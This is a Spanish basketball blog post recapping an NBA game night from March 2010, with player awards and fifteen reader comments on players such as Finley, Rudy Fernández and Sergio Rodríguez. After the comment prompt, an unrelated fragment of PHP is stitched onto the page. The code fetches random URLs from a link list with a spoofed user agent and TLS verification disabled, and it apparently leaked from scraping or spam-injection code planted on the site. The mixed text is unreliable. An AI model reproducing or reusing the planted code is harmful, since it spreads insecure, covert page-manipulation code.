La Crónica (01/03/2010)

02 de March de 2010 por telekoman

Un partido destacaba por encima del resto de la jornada. La lucha entre Denver y Phoenix parecía disolverse cual azucarillo tras un primer cuarto en el que los Nuggets consiguieron una ventaja de 9 puntos pero los reservas de los Suns debieron de pensar que eso no podía acabar ahí y en un gran segundo cuarto, comandados por Dragic y Frye, lograron, no sólo reducir la ventaja, si no darle la vuelta para acabar con un 57-44 a su favor. Ahí si que se rompió definitivamente el partido. Amare y Nash volvieron a su protagonismo positivo mientras que esta vez Melo y Billups acapararon el negativo. Con esta victoria sobre Denver, y la sorprente derrota de Utah, Phoenix consigue que la lucha por la tercera plaza del Oeste sea de lo más interesante.

El otro partido a priori más interesante, el Dallas – Charlotte, se saldó con la octava victoria consecutiva de los de Carlisle. 27 puntos de Nowitzki, 22 puntos de Butler y 20 de Terry es algo que debería preocupar al resto de equipos. También de la segunda mitad de los de Dallas, en la que dejaron a los Bobcats en tan sólo 31. Preocupante para los de Brown el bajón de prestaciones de Gerald Wallace desde el All-Star.

Como decíamos antes, Utah perdió en el último partido de la jornada frente a los irregulares Clippers por tan sólo 4 puntos. Los 20 puntos de Boozer y los 13 puntos y 13 asistencias de Deron no fueron suficientes ante el gran partido de todo el quinteto titular de los de Los Angeles, con todos por encima de 12 puntos y Eric Gordon yéndose a 24. Utah pierde la oportunidad de pasar a Denver y ve como Phoenix se les acerca a toda prisa.

El resto de partidos no se salieron del guión preestablecido. Cleveland pasó por encima de los Knicks casi sin despeinarse con Jamison cada vez más integrado. Justo el día que O’Neal pasaba por el quirófano con un esguince en el dedo gordo de la mano, los Cavaliers conseguían 6o rebotes dejando en 31 a su rival. Orlando, por su parte, se libraba sin ningún esfuerzo de Philadelphia con Howard jugando tan solo 24 minutos por las faltas, dejando el ataque en manos de Nelson, Lewis y Carter. Atlanta lo tenía también fácil frente a unos Bulls a los que de repente parece que les falta gasolina. Portland ganaba a Memphis en su casa con un gran partido de Roy y de Batum, al que parece que los focos le están sentando bien, mientras que a los Grizzlies también se les empieza a notar el cansancio. Los Spurs, de la mano de un Duncan imparable en la zona, derrotaron a unos Hornets que se están complicando mucho su presencia en Playoffs. Y por último, unos Raptors sin Bosh ni Calderón cayeron sin pena ni gloria ante unos Rockets en los que la presencia de Kevin Martin se nota cada vez más.

PREMIOS

MVP: Buenas actuaciones de Nelson, Lebron, Josh Smith, Duncan, Kevin Martin y Aaron Brooks. Pero nos vamos a quedar con los 27 puntos y 13 rebotes de Nowitzki, por la actuación de hoy, y las 7 anteriores.

Rookie: Jrue Holliday fue de lo poco potable del equipo de Philadelphia con 23 puntos y 6 asistencias, pero el duo Collison – Thorton merece de nuevo nuestra atención. Esta vez se lo damos a Thorton que se fue hasta los 30 puntos a los que añadió 7 asistencias.

Sorpresa: Que dos equipos superen a sus contrincantes en más de  25 rebotes me parece una gran sorpresa de las grandes. Sobre todo si uno de ellos es Cleveland y su center titular acaba de pasar por el quirófano.

Decepción: No sé hasta que punto el bajo rendimiento de McGrady puede ser una decepción pero al menos lo considero una gran  lástima para los fans de la Gran Manzana. Otra decepción es el partido de los Raptors. Vale, te falta tu estrella, pero ponle un poquito de coraje. A este paso los canadienses van a llegar a una zona bastante incómoda de la clasificación.

Esfuerzo en vano: Entre Billups, Carmelo y JR Smith han conseguido 54 puntos, pero no es ese el camino de la victoria, sobre todo si miramos los 14 tiros fallados por Melo y las 4 asistencias de Billups.

Comenta

15 comentarios a esta entrada

  1. Love Denise dice:
    #1

    El nivel de la conferencia Este es pésima, da pena ver a los equipos del 5º al 15º, e incluso si me apuras, si los Celtics jugasen en el Oeste, no entrarían en Play-offs, actualmente, según el balance de victorias y derrotas, irían 6º en el oeste,sin tener en cuenta que jugarían más veces contra Lakers, Mavs, Nuggets, etc.. y menos contra Nets, Knicks, pacers, etc..

    Muy buena noticia el nivelazo de los rookies de Hornets. Si Toney Douglas empieza a robarle minutos a Sergio, …apaga y vamonos.

      Citar

  2. TheDeerHunter dice:
    #2

    a colación de lo que comentabas en el artículo anterior, los Spurs han cortado a uno de sus “viejunos”… Michael Finley.
    Qué lástima de salida de un gran profesional, por la puerta de atrás y casi en silencio.

    Quien sabe… igual de quien se habla para el Madrid podría ser Finley

      Citar

  3. Txusma dice:
    #3

    A Ginobili aun le veo pero Finley no haría absolutamente nada en Europa…

      Citar

  4. TheDeerHunter dice:
    #4

    no entiendo porqué
    hombre… ginobili sería para el madrid impresionante, pero creo que Finley sí lo podría hacer bien

      Citar

  5. Love Denise dice:
    #5

    coincido con txusma en que finley no creo que le sirviera mucho al madrid. Obviamente no está para ser jugador franquicia, está para hacer lo que pueda en 10-15 minutitos, y para eso el madrid no ficharía a otro extracomunitario, además de, al venir de la NBA y haber sido una estrella, su caché será elevado.

      Citar

  6. pcerezo dice:
    #6

    Buena carrera al final la de Finley (del club del Gospel). Consiguió su anillo y buen puñado de dólares. Los mejores años en esos Dallas Mavericks de Nelson.

    Ojo a Mavs, carburando y mejorando. Cuidado que el trade puede ser más importante de lo que yo en un principio me creía. A vigilar.

    Sergio me da la sensación que no está para competir a alto nivel, puede que me equivoque seguiremos observando…

    Totalmente de acuerdo con el comentario sobre el Este, el nivel es pésimo y tal come dices Love Denise no creo que a los actuales Celtics les llegará para play offs en el oeste.

    Pablo

      Citar

  7. Txusma dice:
    #7

    Ya comente que la llegada de Haywood a los Mavs era absolutamente clave pq la mejora respecto Dampier es máxima. Y evidentemente Butler es otro super crack así que Dallas puede llegar a finales de conferencia y una vez allí exprirmir al máximo a los Lakers.

    Y no veo a Finley jugando en Europa a gran nivel. Por la edad, pq ya esta de vuelta de todo y sin ningun tipo de motivacion y pq le costara adaptarse al basquet europeo. Yo no me gastaria los cuartos en él.

      Citar

  8. Love Denise dice:
    #8

    Desde el primer momento, el trade mavs-wizards me pareció un negocio redondo para Mavs, y cada vez estoy más convencido que salvo importantes lesiones, las finales de conferencia serán Lakers vs Mavs y Cleveland vs Orlando.
    Y si hay algún propietario de un equipo NBA que merezca el anillo, ese es Mark Cuban, el tipo pone bastante empeño, ganas y dólares para hacer equipos ganadores.

      Citar

  9. pcerezo dice:
    #9

    Love Denise, apuntan muy bien esas dos finales. Los Lakers deberían estar atentos y creo que en condiciones normales Cavs son favoritos pero el año pasado también lo eran…

    Creo que Finley tirará o por la tele o por entrenar, venirse a Europa después del pastizal que ha ganado sería meterse en un berenjenal…

      Citar

  10. TheDeerHunter dice:
    #10

    Dar a los Cavs favoritos… más aún sin Shaq en lo que queda de regular me parece como mínimo audaz.

    Lo de Finley… pues posiblemente tengáis razón. Todo depende de las ganas de jugar que le queden. Si le quedaran, no veo porqué no podría hacer un buen papel en Europa. Su problema en la NBA es físico.

      Citar

  11. Love Denise dice:
    #11

    no doy como favorito a los Cavs, pero dado el pésimo nivel del Este, lo más logico es que la final sea un Cavs vs Magic (y creo que ganarían los Magic). Shaq es importante, pero tampoco es la panacea. Los Cavs pueden llegar perfectamente a las finales de conferencia sin él.

    no me extrañaría que finley recalase en algun aspirante al anillo, como los propios Mavs,.

      Citar

  12. Danicarba dice:
    #12

    Bueno, mala noche para los españoles en la NBA. Ayer vi el Portland-Memphis y la verdad q Marc aún cuajó una buena actuación, de 7 sobre 10 en el mejor de los casos. A los grizzlies un base decente les valdría la vida y su participación en los PO, y una suerte que se estén marcando una temporada tan digna, porque lo de Thabeet es lamentable viendo todos los rookies que han salido este año y cómo están llegando a cuajar en sus respectivos equipos. Portland es ahoramismo una banda, no creo que pasen de 1º Ronda por lo mismo por lo que no fueron capaces el año pasado, aunque pueden escudarse en su frustrado juego interior. A rudy se le ve desesperado, poco participativo en el juego del equipo y con cierta ansiedad. Lo mejor que le puede pasar sinceramente es que Batum se destape y puedan traspasarlo sin ofender a toda la afición femenina de Portland. No creo que vaya a mejorar sus prestaciones en lo que queda de campaña ni en temporadas venideras, la verdad. Creo que está muy desaprovechado. En cuanto a Sergio, creo que las cosas no pintan bien. NY es una banda y no se ven trazas de que pueda hacer algo realmente significante que se traduzca en más temporadas jugando en el Madison. Si Dántoni no le saca provecho, y él tampoco lo hace con Dántoni, la NBA le dará la espalda definitivamente. Creo que está intentando ser un base más cerebral, intentando demostrar que puede lelvar al equipo como Base titular, pero o le falta rodamiento o sencillamente no es capaz. Una lástima, poruqe yo particularmente siempre he confiado en su calidad, pero creo que en esto se va a quedar.

      Citar

  13. Love Denise dice:
    #13

    “”””y puedan traspasarlo sin ofender a toda la afición femenina de Portland”””. Perdon por mi ignorancia, pero… ¿Rudy es el guaperas de Portland?el preferido por las adolescentes de allí?

      Citar

  14. sergio dice:
    #14

    lo es… que yo sepa

      Citar

  15. danicarba dice:
    #15

    Pues si, yo tampoco me lo explico, supongo que será porque es blanco, sin intención de ofender o parecer racista eh. Aunque la verdad no sé ahora mismo dónde lo lei, pero decían que era el que más camistas vendía después de BRoY (tampoco tengo claro esto, por eso no me atrevo a decir que en realidad es el primero. El segundo seguro)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>